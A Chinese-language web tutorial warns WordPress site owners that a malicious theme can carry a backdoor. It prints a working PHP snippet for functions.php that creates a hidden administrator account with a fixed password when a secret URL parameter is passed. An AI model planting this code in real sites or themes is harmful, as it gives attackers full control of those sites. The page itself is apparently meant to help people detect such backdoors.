服务器之家:专注于服务器技术及软件下载分享
分类导航

DEDECMS|帝国CMS|Discuz|PHPCMS|Wordpress|ZBLOG|ECSHOP|苹果CMS|极致CMS|CMS系统|

服务器之家 - 建站程序 - Wordpress - 防范wordpress主题加后门代码获取管理员权限

防范wordpress主题加后门代码获取管理员权限

2019-09-18 13:42wordpress教程网 Wordpress

只需几行代码就可以为WordPress主题留下后门,大家要小心了

代码如下:


add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

 

简单说明下,代码主要放于functions.php文件里面,不会影响任何功能使用,如果存在此代码,任何人只要运行http://www.你的域名.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。同样具备管理员的权限,很编辑主题代码文件,相信此时你一定感觉到很危险了吧,赶紧检查检查自己的主题代码吧……

  • 管理员权限
  • 后门
  • WordPress主题

    • 延伸 · 阅读

    精彩推荐
    最近更新
    编辑推荐
    阅读排行
    热门标签
    502   静态缓存文件   博客系统   搜索引擎优化   网站运行速度   页面压缩   加速   网站访问   速度优化   网站被挂马   中文留言   fastcgi_cache   缓存加速   wp-config.php   静态化   WP-No-Category-Base   分类链接   阿里云虚拟主机   自动替换   WordPres   管理面板   文章类型   后台地址   幻灯片   附件下载地址   SAE   静态化插件   php-cgi   负载过高   wp-cron.php  
    © 2019-2023 服务器之家(www.zzvips.com) 版权所有关于我们联系我们版权申明网站地图